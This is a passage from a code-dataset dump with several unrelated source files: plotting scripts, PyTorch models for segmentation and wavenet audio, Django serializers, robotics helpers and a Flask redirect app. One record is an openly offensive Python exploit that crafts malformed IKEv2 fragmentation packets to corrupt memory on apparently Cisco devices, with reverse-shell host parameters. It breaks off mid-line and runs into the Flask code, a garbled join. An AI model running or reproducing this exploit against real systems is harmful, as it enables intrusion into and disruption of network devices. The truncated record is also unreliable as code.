Phase')\n plt.subplots_adjust(bottom=.05, top=.9)\n plt.show()\n\n\ndef build_iteration_df(files):\n '''Creates DataFrame for training information'''\n df = pd.DataFrame(columns=['Iteration', 'Time', 'Loss',\n 'Test', 
'Opt', 'Reference'])\n for f_in in files:\n ext = f_in.split('/')\n test_number = ext[3]\n optimization = ext[4]\n reference_number = ext[-1][0]\n with open(f_in, 'r') as file_in:\n line = file_in.readline()\n while line:\n it = re.match('Iter.*', line)\n if it is not None:\n data_map = {}\n it = it.group(0).split()\n data_map['Iteration'] = int(it[1])\n data_map['Time'] = float(it[2].split('=')[1])\n data_map['Loss'] = float(it[3].split('=')[1])\n data_map['Test'] = test_number\n data_map['Opt'] = optimization\n data_map['Reference'] = int(reference_number)\n df = df.append(data_map, ignore_index=True)\n line = file_in.readline()\n return df\n\n\ndef plot_training(training_dataframe):\n '''Creates Training Graph'''\n fig, ax = plt.subplots(5, 3)\n col = 0\n s = ['Unigram', 'Trigram', '5-Gram']\n s2 = ['n', 'n+1, n-1', 'n+2, n-2']\n \n for j, test in training_dataframe.groupby('Test'):\n row = 0\n for ind, obj in test.groupby('Opt'):\n # print(ind)\n for jind, jobj in obj.groupby('Reference'):\n ax1 = jobj.plot(x='Iteration', y='Loss',\n ax=ax[row, col], loglog=True)\n ax1.set_xlabel('Optimization Iteration - Log Scale', fontsize='x-small')\n ax1.set_yticklabels([], minor=True)\n ax1.set_yticklabels([])\n ax1.set_yticks([], minor=True)\n ax1.set_yticks([])\n ax1.set_xticklabels([], minor=True)\n ax1.set_xticklabels([])\n ax1.set_xticks([], minor=True)\n ax1.set_xticks([])\n if col<=1:\n ax1.legend(s)\n else:\n ax1.legend(s2)\n row = row + 1\n col = col + 1\n ax[0,0].\\\n set_title('Testing Phase 1: No Sentiment', fontsize='x-small')\n ax[0,1].\\\n set_title('Testing Phase 2: Token Level Sentiment', fontsize='x-small')\n ax[0,2].\\\n set_title('Testing Phase 3: n-level Sentiment', fontsize='x-small')\n ax[0,0].\\\n set_ylabel('ap')\n ax[1,0].set_ylabel('arow')\n ax[2,0].set_ylabel('l2sgd')\n ax[3,0].set_ylabel('lbfgs')\n ax[4,0].set_ylabel('pa')\n fig.suptitle('Training Loss over Iterations by Test Phase and Algorithm (Log-Log Scale)')\n plt.subplots_adjust(bottom=.05, top=.9)\n plt.show()\n\n\n# Driver Code\ntfiles = glob.glob(TRAINING)\nrfiles = glob.glob(RESULTS)\n# ffiles = glob.glob(FEATURES)\n\n\n# TRAINING\ndft = build_iteration_df(tfiles)\nplot_training(dft)\n\n# RESULTS\n# File I/O and Pandas DataFrame\ndfr = build_result_df(rfiles)\n\n# Trim DataFrames\nt1_dfr = dfr[dfr['test'] == 'test1'].drop('macro').drop('micro').\\\n drop('o').drop('weighted').drop('support', axis=1)\n# a = [(ind, obj) for ind, obj in t1_dfr.groupby('reference')]\nt2_dfr = dfr[dfr['test'] == 'test2'].drop('macro').drop('micro').\\\n drop('o').drop('weighted').drop('support', axis=1)\nt3_dfr = dfr[dfr['test'] == 'test3'].drop('macro').drop('micro').\\\n drop('o').drop('weighted').drop('support', axis=1)\n\nall_results = [t1_dfr, t2_dfr, t3_dfr]\nplot_results(all_results)\n","sub_path":"semeval_11_2020/CRF_Final/main/vis/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":6410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"354759222","text":"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom model.backbone.Res2Net import res2net50_v1b_26w_4s\n\n\nclass BasicConv2d(nn.Module):\n def __init__(self, in_planes, out_planes, kernel_size, stride=1, padding=0, dilation=1 ,userelu=False):\n super(BasicConv2d, self).__init__()\n\n self.conv = nn.Conv2d(in_planes, out_planes,\n kernel_size=kernel_size, stride=stride,\n padding=padding, dilation=dilation, bias=False)\n self.bn = nn.BatchNorm2d(out_planes)\n self.relu = 
nn.ReLU(inplace=True)\n self.userelu =False\n\n def forward(self, x):\n x = self.conv(x)\n x = self.bn(x)\n\n return x\n\n\nclass DecoderBlock(nn.Module):\n def __init__(self, in_channels, out_channels,\n kernel_size=3, stride=1, padding=1,doubleconv=True):\n super(DecoderBlock, self).__init__()\n\n self.conv1 = BasicConv2d(in_channels, in_channels, kernel_size=kernel_size,\n stride=stride, padding=padding)\n\n self.conv2 = BasicConv2d(in_channels, out_channels, kernel_size=kernel_size,\n stride=stride, padding=padding)\n self.doubleconv =doubleconv\n self.upsample = nn.Upsample(scale_factor=2, mode='bilinear')\n\n def forward(self, x):\n if self.doubleconv:\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.upsample(x)\n return x\n\n\nclass SELayer(nn.Module):\n def __init__(self, channel, reduction=16):\n super(SELayer, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.fc = nn.Sequential(\n nn.Linear(channel, channel // reduction, bias=False),\n nn.ReLU(inplace=True),\n nn.Linear(channel // reduction, channel, bias=False),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n b, c, _, _ = x.size()\n y = self.avg_pool(x).view(b, c)\n y = self.fc(y).view(b, c, 1, 1)\n return x * y.expand_as(x)\n\n\nclass AFM(nn.Module):\n def __init__(self, in_channels, all_channels):\n super(AFM, self).__init__()\n self.selayer = SELayer(all_channels)\n\n def forward(self, higerencoder, encoder, decoder):\n fuse = torch.cat([encoder, decoder, higerencoder], dim=1)\n fuse = self.selayer(fuse)\n return fuse\n\n\nclass RCM(nn.Module):\n def __init__(self, in_channels, out_channel):\n super(RCM, self).__init__()\n # self.conv1 = BasicConv2d(in_channels, in_channels, 3, padding=1)\n self.conv2 = BasicConv2d(in_channels, out_channel, 1)\n self.conv3 = BasicConv2d(out_channel, out_channel, 3, padding=1)\n\n def forward(self, encoder, afm):\n # encoder = self.conv1(encoder)\n encoder = self.conv2(encoder)\n fuse = encoder + afm\n fuse = self.conv3(fuse)\n return fuse\nclass RFB_modified(nn.Module):\n def __init__(self, in_channel, out_channel):\n super(RFB_modified, self).__init__()\n self.relu = nn.ReLU(True)\n self.branch0 = nn.Sequential(\n BasicConv2d(in_channel, out_channel, 1),\n )\n self.branch1 = nn.Sequential(\n BasicConv2d(in_channel, out_channel, 1),\n BasicConv2d(out_channel, out_channel, kernel_size=(1, 3), padding=(0, 1)),\n BasicConv2d(out_channel, out_channel, kernel_size=(3, 1), padding=(1, 0)),\n BasicConv2d(out_channel, out_channel, 3, padding=3, dilation=3)\n )\n self.branch2 = nn.Sequential(\n BasicConv2d(in_channel, out_channel, 1),\n BasicConv2d(out_channel, out_channel, kernel_size=(1, 5), padding=(0, 2)),\n BasicConv2d(out_channel, out_channel, kernel_size=(5, 1), padding=(2, 0)),\n BasicConv2d(out_channel, out_channel, 3, padding=5, dilation=5)\n )\n self.branch3 = nn.Sequential(\n BasicConv2d(in_channel, out_channel, 1),\n BasicConv2d(out_channel, out_channel, kernel_size=(1, 7), padding=(0, 3)),\n BasicConv2d(out_channel, out_channel, kernel_size=(7, 1), padding=(3, 0)),\n BasicConv2d(out_channel, out_channel, 3, padding=7, dilation=7)\n )\n self.conv_cat = BasicConv2d(4*out_channel, out_channel, 3, padding=1)\n self.conv_res = BasicConv2d(in_channel, out_channel, 1)\n\n def forward(self, x):\n x0 = self.branch0(x)\n x1 = self.branch1(x)\n x2 = self.branch2(x)\n x3 = self.branch3(x)\n x_cat = self.conv_cat(torch.cat((x0, x1, x2, x3), 1))\n\n x = self.relu(x_cat + self.conv_res(x))\n return x\n\n\nclass BiDFNet(nn.Module):\n def __init__(self, channel=64):\n super(BiDFNet, 
self).__init__()\n\n self.resnet = res2net50_v1b_26w_4s(pretrained=True)\n\n self.Translayer0 = RFB_modified(64, channel)\n self.Translayer1 = RFB_modified(256, channel)\n self.Translayer2 = RFB_modified(512, channel)\n self.Translayer3 = RFB_modified(1024, channel)\n self.Translayer4 = RFB_modified(2048, channel)\n\n self.upsample = nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True)\n\n # self.decoder5 = DecoderBlock(in_channels=512, out_channels=512)\n self.decoder4 = DecoderBlock(in_channels=channel, out_channels=channel)\n self.decoder3 = DecoderBlock(in_channels=channel * 3, out_channels=channel)\n self.decoder2 = DecoderBlock(in_channels=channel * 3, out_channels=channel)\n self.decoder1 = DecoderBlock(in_channels=channel * 3, out_channels=channel)\n self.decoder0 = nn.Sequential(BasicConv2d(channel * 3, channel, 1),\n BasicConv2d(channel, channel, 1))\n self.decoder5 = nn.Sequential(BasicConv2d(channel * 2, channel, 1),\n BasicConv2d(channel, channel, 1))\n self.decoder6 = DecoderBlock(in_channels=channel * 2, out_channels=channel,doubleconv=False)\n self.decoder7 = DecoderBlock(in_channels=channel * 2, out_channels=channel,doubleconv=False)\n self.decoder8 = DecoderBlock(in_channels=channel * 2, out_channels=channel,doubleconv=False)\n self.decoder9 = DecoderBlock(in_channels=channel, out_channels=channel,doubleconv=False)\n\n # adaptive Fusion module\n self.afm3 = AFM(channel, channel * 3)\n self.afm2 = AFM(channel, channel * 3)\n self.afm1 = AFM(channel, channel * 3)\n self.afm0 = AFM(channel, channel * 3)\n self.afm4 = SELayer(channel)\n\n self.rcm1 = RCM(channel * 3, channel)\n self.rcm2 = RCM(channel * 3, channel)\n self.rcm3 = RCM(channel * 3, channel)\n self.rcm0 = RCM(channel * 3, channel)\n self.rcm4 = RCM(channel, channel)\n\n self.unetout1 = nn.Conv2d(channel, 1, 1)\n self.unetout2 = nn.Conv2d(channel, 1, 1)\n\n def forward(self, x):\n basic = x\n x = self.resnet.conv1(x)\n x = self.resnet.bn1(x)\n x0 = self.resnet.relu(x) # 64 172 172\n\n # ---- low-level features ----\n x = self.resnet.maxpool(x0) # bs, 64, 88, 88\n x1 = self.resnet.layer1(x) # bs, 256, 88, 88\n\n # ---- high-level features ----\n x2 = self.resnet.layer2(x1) # bs, 512, 44, 44\n x3 = self.resnet.layer3(x2) # bs, 1024, 22, 22\n x4 = self.resnet.layer4(x3) # bs, 2048, 11, 11\n\n x0 = self.Translayer0(x0)\n x1 = self.Translayer1(x1)\n x2 = self.Translayer2(x2)\n x3 = self.Translayer3(x3)\n x4 = self.Translayer4(x4)\n\n # decoder1\n\n afm4 = self.afm4(x4)\n d1_4 = self.decoder4(afm4) # b 320 22 22\n afm3 = self.afm3(x3, self.upsample(x4), d1_4) # 512+320+320\n d1_3 = self.decoder3(afm3) # b 128 44 44\n afm2 = self.afm2(x2, self.upsample(x3), d1_3)\n d1_2 = self.decoder2(afm2) # b 128 88 88\n afm1 = self.afm1(x1, self.upsample(x2), d1_2)\n d1_1 = self.decoder1(afm1)\n afm0 = self.afm0(x0, self.upsample(x1), d1_1)\n d1_0 = self.decoder0(afm0)\n\n # rcm\n x0 = self.rcm0(afm0, x0) # b 64 88 88\n x1 = self.rcm1(afm1, x1) # b 64 88 88\n x2 = self.rcm2(afm2, x2) # b 64 44 44\n x3 = self.rcm3(afm3, x3) # b 64 22 22\n x4 = self.rcm4(afm4, x4) # b 64 11 11\n\n # feedback\n guidance = d1_0\n guidance0 = F.interpolate(guidance, scale_factor=1 / 16, mode='bilinear')\n guidance1 = F.interpolate(guidance, scale_factor=1 / 8, mode='bilinear')\n guidance2 = F.interpolate(guidance, scale_factor=1 / 4, mode='bilinear')\n guidance3 = F.interpolate(guidance, scale_factor=1 / 2, mode='bilinear')\n x4 = x4 + guidance0\n x3 = x3 + guidance1\n x2 = x2 + guidance2\n x1 = x1 + guidance3\n x0 = x0 + guidance\n\n # 
decoder 2\n x4_1 = x4\n x3_1 = self.upsample(x4) * x3\n x2_1 = self.upsample(x3) * x2\n x1_1 = self.upsample(x2) * x1\n x0_1 = self.upsample(x1) * x0\n\n x4_1 = self.decoder9(x4_1)\n x3_2 = torch.cat((x3_1, x4_1), 1)\n x3_2 = self.decoder8(x3_2)\n x2_2 = torch.cat((x2_1, x3_2), 1)\n x2_2 = self.decoder7(x2_2)\n x1_2 = torch.cat((x1_1, x2_2), 1)\n x1_2 = self.decoder6(x1_2)\n\n x0_2 = torch.cat((x0_1, x1_2), 1)\n x0_2 = self.decoder5(x0_2)\n\n pred1 = self.unetout1(d1_0)\n pred2 = self.unetout2(x0_2)\n\n pred2 = F.interpolate(pred2, scale_factor=2, mode='bilinear')\n pred1 = F.interpolate(pred1, scale_factor=2, mode='bilinear')\n\n return pred1, pred2\n\n\nif __name__ == '__main__':\n model = BiDFNet().cuda()\n input_tensor = torch.randn(1, 3, 352, 352).cuda()\n\n pred2, pred1 = model(input_tensor)\n print(pred2.size())\n print(pred1.size())\n # print(prediction1.size())\n # print(prediction2.size())\n # print(prediction3.size())\n # print(prediction4.size())\n\n # net =BCA(64,64,64)\n # a =torch.rand(1,64,44,44)\n # b =torch.rand(1,64,44,44)\n # print(net(a,b).size())","sub_path":"model/idea1/BiDFNet-Resnet.py","file_name":"BiDFNet-Resnet.py","file_ext":"py","file_size_in_byte":9999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"11275561","text":"\"\"\"Structure of account related models API responses with Django Rest Framework serializers.\"\"\"\nfrom django.contrib.auth import get_user_model\n\nfrom rest_framework import serializers\n\nfrom ..models import Organization, OrganizationAccess\n\n\nclass OrganizationAccessSerializer(serializers.ModelSerializer):\n \"\"\"\n Organization access serializer.\n\n Represents the link between a user and an organization, with a role that grants a specific\n level of access.\n \"\"\"\n\n organization_name = serializers.SerializerMethodField()\n\n class Meta:\n \"\"\"Meta for OrganizationAccessSerializer.\"\"\"\n\n model = OrganizationAccess\n fields = [\n \"organization\",\n \"organization_name\",\n \"role\",\n \"user\",\n ]\n\n def get_organization_name(self, organization_access):\n \"\"\"\n Get field for Serializer Method.\n\n Add the organization name on organization accesses directly, to avoid nesting an\n additional object just for one string.\n \"\"\"\n return organization_access.organization.name\n\n\nclass OrganizationSerializer(serializers.ModelSerializer):\n \"\"\"Serializer to display a complete Organization resource.\"\"\"\n\n class Meta:\n \"\"\"Meta for OrganizationSerializer.\"\"\"\n\n model = Organization\n fields = [\n \"consumer_sites\",\n \"created_on\",\n \"id\",\n \"name\",\n \"users\",\n ]\n\n\nclass UserSerializer(serializers.ModelSerializer):\n \"\"\"\n Regular user serializer.\n\n Allowlist fields as user objects contain a lot more information\n than we'd like to expose on the API.\n \"\"\"\n\n organization_accesses = OrganizationAccessSerializer(many=True)\n\n class Meta:\n \"\"\"Meta for UserSerializer.\"\"\"\n\n model = get_user_model()\n fields = [\n \"date_joined\",\n \"email\",\n \"first_name\",\n \"id\",\n \"is_staff\",\n \"is_superuser\",\n \"last_name\",\n \"organization_accesses\",\n ]\n","sub_path":"src/backend/marsha/core/serializers/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"331643221","text":"from pinocchio import se3\nimport copy\nimport numpy as np\n\ndef vectorToSE3(vec): \n M = se3.SE3()\n\n rot_tmp = 
np.matrix(np.ones((3, 3)))\n rot_tmp[0:3, 0] = vec[3:6]\n rot_tmp[0:3, 1] = vec[6:9]\n rot_tmp[0:3, 2] = vec[9:12]\n\n M.translation = copy.deepcopy(vec[0:3])\n M.rotation = rot_tmp\n return M\n\ndef SE3toVector(M):\n ref = np.matrix(np.zeros(12)).transpose()\n ref[0:3] = copy.deepcopy(M.translation)\n ref[3:6] = copy.deepcopy(M.rotation[0:3, 0])\n ref[6:9] = copy.deepcopy(M.rotation[0:3, 1])\n ref[9:12] = copy.deepcopy(M.rotation[0:3, 2])\n\n return ref\n\n\ndef skew(x):\n # skew-symmetric matrix of x, so that skew(x).dot(v) equals cross(x, v)\n return np.array([[0, -x[2], x[1]],\n [x[2], 0, -x[0]],\n [-x[1], x[0], 0]])","sub_path":"Utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"513176358","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Function\nimport numpy as np\n\nclass Conv(torch.nn.Module):\n \"\"\"\n A convolution with the option to be causal and use xavier initialization\n \"\"\"\n def __init__(self, in_channels, out_channels, kernel_size=1, stride=1,\n dilation=1, bias=True, w_init_gain='linear', is_causal=False):\n super(Conv, self).__init__()\n self.is_causal = is_causal\n self.kernel_size = kernel_size\n self.dilation = dilation\n\n self.conv = torch.nn.Conv1d(in_channels, out_channels,\n kernel_size=kernel_size, stride=stride,\n dilation=dilation, bias=bias)\n\n torch.nn.init.xavier_uniform_(\n self.conv.weight, gain=torch.nn.init.calculate_gain(w_init_gain))\n\n def forward(self, signal):\n #if self.is_causal:\n # padding = (int((self.kernel_size - 1) * self.dilation), 0)\n # signal = torch.nn.functional.pad(signal, padding)\n return self.conv(signal)\n\nclass Wavenet(nn.Module):\n def __init__(self, pad, sd, rd, dilations0,dilations1,device):\n print(\"nv wavenet\")\n self.dilations1 = dilations1\n self.device=device\n sd = 512\n rd = 128\n self.sd = sd\n self.rd = rd\n self.init_filter=2\n self.field=np.sum(dilations1)+self.init_filter\n wd = 128\n print('sd rd:',sd,rd)\n self.wd=wd\n super(Wavenet, self).__init__()\n self.embedy = torch.nn.Embedding(256,wd)\n #self.casual = torch.nn.Conv1d(256,wd,self.init_filter)\n self.pad = pad\n self.ydcnn = nn.ModuleList()\n self.ydense = nn.ModuleList()\n self.yskip = nn.ModuleList()\n\n for i, d in enumerate(self.dilations1):\n self.ydcnn.append(Conv(wd, wd*2,kernel_size=2, dilation=d, w_init_gain='tanh', is_causal=True))\n #self.ydcnn.append(Conv(rd, 2 * rd, kernel_size=2, dilation=d, w_init_gain='relu', is_causal=True))#try relu\n self.yskip.append(Conv(wd, sd,w_init_gain='relu'))\n self.ydense.append(Conv(wd, wd,w_init_gain='linear'))\n\n self.post1 = Conv(sd, sd, bias=False, w_init_gain='relu')\n self.post2 = Conv(sd, 256, bias=False, w_init_gain='linear')\n\n def forward(self, y):\n y = self.embedy(y.long())\n y = y.transpose(1, 2)\n\n finalout = y.size(2)-(self.field-1)\n\n for i, d in enumerate(self.dilations1):\n in_act = self.ydcnn[i](y)\n in_act = in_act\n t_act = torch.nn.functional.tanh(in_act[:, :self.wd, :])\n s_act = torch.nn.functional.sigmoid(in_act[:, self.wd:, :])\n acts = t_act * s_act\n\n res_acts = self.ydense[i](acts)\n\n if i == 0:\n output = self.yskip[i](acts[:,:,-finalout:])\n else:\n output = self.yskip[i](acts[:,:,-finalout:]) + output\n\n y = res_acts + y[:,:,d:]\n\n output = torch.nn.functional.relu(output, True)\n output = self.post1(output)\n output = torch.nn.functional.relu(output, True)\n output = self.post2(output)\n\n return output\n\n def infer(self,queue,l = 16000*1):\n #y = 
torch.randint(0, 255, (1,1)).to(self.device)\n y = torch.randint(0, 255, (1,1)).to(self.device)\n l = int(l)\n music=torch.zeros(l)\n for idx in range(l):\n y = self.embedy(y.long())\n y = y.transpose(1, 2)\n for i, d in enumerate(self.dilations1):\n y = torch.cat((queue[i],y),2)\n if(d == 1):\n queue[i] = y[:,:,:1].clone()\n else:\n queue[i] = torch.cat((queue[i][:, :, 1:], y[:, :, :1]), 2)\n in_act = self.ydcnn[i](y)\n t_act = torch.nn.functional.tanh(in_act[:, :self.wd, :])\n s_act = torch.nn.functional.sigmoid(in_act[:, self.wd:, :])\n acts = t_act * s_act\n\n res_acts = self.ydense[i](acts)\n\n if i == 0:\n output = self.yskip[i](acts[:,:,-1:])\n else:\n output = self.yskip[i](acts[:,:,-1:]) + output\n\n y = res_acts + y[:,:,d:]\n\n output = torch.nn.functional.relu(output, True)\n output = self.post1(output)\n output = torch.nn.functional.relu(output, True)\n output = self.post2(output)\n y = output.max(1, keepdim=True)[1].view(-1)[0]\n y = y.view(1,1)\n music[idx] = y.cpu()[0,0]\n return music\n\n def slowInfer(self,queue,input=None,l = 16000*0.01):\n l = int(l)\n label = input[:,self.field:self.field+l].clone().view(-1)\n input = input[:,:self.field].clone().to(self.device)\n\n music=torch.zeros(l)\n for idx in range(l):\n y = self.embedy(input)\n y = y.transpose(1, 2)\n for i, d in enumerate(self.dilations1):\n in_act = self.ydcnn[i](y)\n t_act = torch.nn.functional.tanh(in_act[:, :self.wd, :])\n s_act = torch.nn.functional.sigmoid(in_act[:, self.wd:, :])\n acts = t_act * s_act\n\n res_acts = self.ydense[i](acts)\n\n if i == 0:\n output = self.yskip[i](acts[:,:,-1:])\n else:\n output = self.yskip[i](acts[:,:,-1:]) + output\n\n y = res_acts + y[:,:,d:]\n\n output = torch.nn.functional.relu(output, True)\n output = self.post1(output)\n output = torch.nn.functional.relu(output, True)\n output = self.post2(output)\n #print(output.shape)\n #print(input.shape,output.max(1, keepdim=True)[1].shape)\n p=F.softmax(output,dim=1)\n out = np.random.choice(np.arange(256), p=p.view(-1).cpu().numpy())\n out = torch.tensor([out],dtype=torch.long).view(1,1).to(self.device)\n input = torch.cat((input[:,1:].long(),out),1)\n music[idx] = input.cpu()[0,-1]\n #print(float(float(torch.sum(music.long() == label.long())) / float(music.shape[0])))\n return music\n\n","sub_path":"nvwavenet.py","file_name":"nvwavenet.py","file_ext":"py","file_size_in_byte":6252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"411569336","text":"#!/usr/bin/env python2.7\n\nimport socket\nimport sys\nimport struct\nimport string\nimport random\nimport time\n\n\nclass Exploit(object):\n def __init__(self, host, revHost, revPort=4444):\n self._host = host\n self._port = 500\n self._revHost = revHost\n self._revPort = revPort\n self._sessions = []\n\n # Create a new SA session\n def create_SA(self, id=None):\n\n # Create a new socket for session\n sess = Session((self._host, self._port), id)\n\n # Append to session list\n self._sessions.append(sess)\n\n return sess\n\n\n# SA Session\nclass Session(object):\n def __init__(self, host_port, id = None):\n if id is None:\n id = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))\n\n self._host, self._port = host_port\n print(\"[+] Create UDP socket\")\n self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self._id = id\n self._mid = 1\n\n # Init session\n print(\"[+] Using session ID: \" + self._id)\n self.send(self.make_SA())\n print(\"[+] Send SA\")\n\n # Check if we got something\n res = 
self.recv()\n cookie = res[8:16]\n print(\"[+] Cookie: \" + cookie)\n\n self._cookie = cookie\n\n # Enforce value of 0x21\n if ord(res[16]) != 0x21:\n raise Exception(\"Invalid router response\")\n\n print(\"[+] New SA successfully created.\")\n\n # UPD socket helpers\n def send(self, buf):\n self._sock.sendto(buf, (self._host, self._port))\n\n def recv(self, size=4096):\n data, addr = self._sock.recvfrom(size)\n return data\n\n def make_SA(self):\n buf = \"\"\n buf += self._id # Initiator SPI\n buf += \"\\x00\"*8 # Responder SPI\n buf += \"\\x21\" # next payload (security association)\n buf += \"\\x20\" # version\n buf += \"\\x22\" # exchange type\n buf += \"\\x08\" # flags\n buf += \"\\x00\"*4 # message ID\n buf += \"$$$$\" # length\n\n # stolen from pcap\n # THIS IS SECURITY ASSOCIATION\n buf += \"\\x22\\x00\\x00\\x6c\\x00\\x00\\x00\\x68\\x01\\x01\\x00\\x0b\\x03\\x00\\x00\\x0c\\x01\\x00\\x00\\x0c\\x80\\x0e\\x01\\x00\\x03\\x00\\x00\\x0c\\x01\\x00\\x00\\x0c\\x80\\x0e\\x00\\x80\\x03\\x00\\x00\\x08\\x01\\x00\\x00\\x03\\x03\\x00\\x00\\x08\\x01\\x00\\x00\\x02\\x03\\x00\\x00\\x08\\x02\\x00\\x00\\x02\\x03\\x00\\x00\\x08\\x02\\x00\\x00\\x01\\x03\\x00\\x00\\x08\\x03\\x00\\x00\\x02\\x03\\x00\\x00\\x08\\x03\\x00\\x00\\x01\\x03\\x00\\x00\\x08\\x04\\x00\\x00\\x02\\x03\\x00\\x00\\x08\\x04\\x00\\x00\\x05\\x00\\x00\\x00\\x08\\x04\\x00\\x00\\x0e\"\n\n # THIS IS KEY EXCHANGE\n # this is the type of the next payload...\n buf += \"\\x28\" # 0x28 = Nonce, 0x2b = vendor ID\n # KEY EXCHANGE DATA\n buf += \"\\x00\\x00\\x88\\x00\\x02\\x00\\x00\\x50\\xea\\xf4\\x54\\x1c\\x61\\x24\\x1b\\x59\\x3f\\x48\\xcb\\x12\\x8c\\xf1\\x7f\\x5f\\xd4\\xd8\\xe9\\xe2\\xfd\\x3c\\x66\\x70\\xef\\x08\\xf6\\x56\\xcd\\x83\\x16\\x65\\xc1\\xdf\\x1c\\x2b\\xb1\\xc4\\x92\\xca\\xcb\\xd2\\x68\\x83\\x8e\\x2f\\x12\\x94\\x12\\x48\\xec\\x78\\x4b\\x5d\\xf3\\x57\\x87\\x36\\x1b\\xba\\x5b\\x34\\x6e\\xec\\x7e\\x39\\xc1\\xc2\\x2d\\xf9\\x77\\xcc\\x19\\x39\\x25\\x64\\xeb\\xb7\\x85\\x5b\\x16\\xfc\\x2c\\x58\\x56\\x11\\xfe\\x49\\x71\\x32\\xe9\\xe8\\x2d\\x27\\xbe\\x78\\x71\\x97\\x7a\\x74\\x42\\x30\\x56\\x62\\xa2\\x99\\x9c\\x56\\x0f\\xfe\\xd0\\xa2\\xe6\\x8f\\x72\\x5f\\xc3\\x87\\x4c\\x7c\\x9b\\xa9\\x80\\xf1\\x97\\x57\\x92\"\n\n # this is the Nonce payload\n buf += \"\\x2b\"\n buf += \"\\x00\\x00\\x18\\x97\\x40\\x6a\\x31\\x04\\x4d\\x3f\\x7d\\xea\\x84\\x80\\xe9\\xc8\\x41\\x5f\\x84\\x49\\xd3\\x8c\\xee\"\n # lets try a vendor id or three\n buf += \"\\x2b\" # next payload, more vendor ID\n buf += \"\\x00\" # critical bit\n vid = \"CISCO-DELETE-REASON\"\n buf += struct.pack(\">H\", len(vid)+4)\n buf += vid\n\n # another vendor id\n buf += \"\\x2b\" # next payload, more vendor ID\n buf += \"\\x00\" # critical bit\n vid = \"CISCO(COPYRIGHT)&Copyright (c) 2009 Cisco Systems, Inc.\"\n buf += struct.pack(\">H\", len(vid)+4)\n buf += vid\n\n # another vendor id\n buf += \"\\x2b\" # next payload, more vid\n buf += \"\\x00\" # crit\n vid = \"CISCO-GRE-MODE\"\n buf += struct.pack(\">H\", len(vid)+4)\n buf += vid\n\n # last vendor id\n buf += \"\\x00\" # next payload\n buf += \"\\x00\"\n vid = \"\\x40\\x48\\xb7\\xd5\\x6e\\xbc\\xe8\\x85\\x25\\xe7\\xde\\x7f\\x00\\xd6\\xc2\\xd3\"\n buf += struct.pack(\">H\", len(vid)+4)\n buf += vid\n\n return buf.replace(\"$$$$\", struct.pack(\">L\", len(buf)))\n\n def make_cisco_fragment(self, flength, seqno, fragid, lastfrag, sploit):\n buf = ''\n buf += self._id # Initiator SPI (random)\n buf += self._cookie # Responder SPI\n buf += \"\\x84\" # next payload\n buf += \"\\x20\" # version\n buf += \"\\x25\" # exchange type (2=identify 
protection)\n buf += \"\\x08\" # flags\n buf += \"\\x00\\x00\\x00\\x01\" # message ID\n buf += \"ABCD\" # length\n\n # PAYLOAD\n payload = \"\"\n payload += \"\\x00\" # next payload (none)\n payload += \"\\x00\" # critical bit\n payload += struct.pack(\">H\", flength) # payload_len # length\n payload += struct.pack(\">H\", fragid) # frag ID\n payload += struct.pack(\"B\", seqno) # frag sequence\n payload += struct.pack(\"B\", lastfrag)\n payload += sploit\n\n buf += payload\n return buf.replace(\"ABCD\", struct.pack(\">L\", len(buf)))\n\n def send_fragment(self, flength, seqno, fragid, lastfrag, sploit):\n buf = self.make_cisco_fragment(flength, seqno, fragid, lastfrag, sploit)\n self.send(buf)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 3:\n print(\"[+] Usage: {0:s} <host> <revHost>[:port]\".format(sys.argv[0]))\n sys.exit(0)\n\n host = sys.argv[1]\n revHost = sys.argv[2]\n\n # Parse revHost\n port = 4444\n if revHost.rfind(\":\") != -1:\n revHost, port = revHost.split(\":\")\n port = int(port)\n\n exploit = Exploit(host, revHost, port)\n sess = exploit.create_SA()\n\n n = 0xd6\n ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))\n sess.send_fragment(0x8 + n + 3, 1, 5, 0, \"A\" * (n + 3))\n\n # Send packets which will trigger the vulnerability\n # Weird packet to get a size of 0x1\n sess.send_fragment(8 + -7, 0, 6, 1, \"A\" * (256 - 7))\n\n # This fragment will be the one being copied\n # during the memory corruption\n buf = \"A\" * (n - 0xd + 0x3)\n buf += struct.pack(\"')\ndef map_route(code):\n if os.path.exists('data.json'):\n with open('data.json') as datafile:\n mapping = json.load(datafile)\n if code in mapping.keys():\n if 'url' in mapping[code].keys():\n return redirect(mapping[code]['url'])\n return abort(404)\n\n\n@app.errorhandler(404)\ndef error_function(error):\n return \"error bro\"\n\n\n@app.route('/api')\ndef session_api():\n return jsonify(list(session.keys()))\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
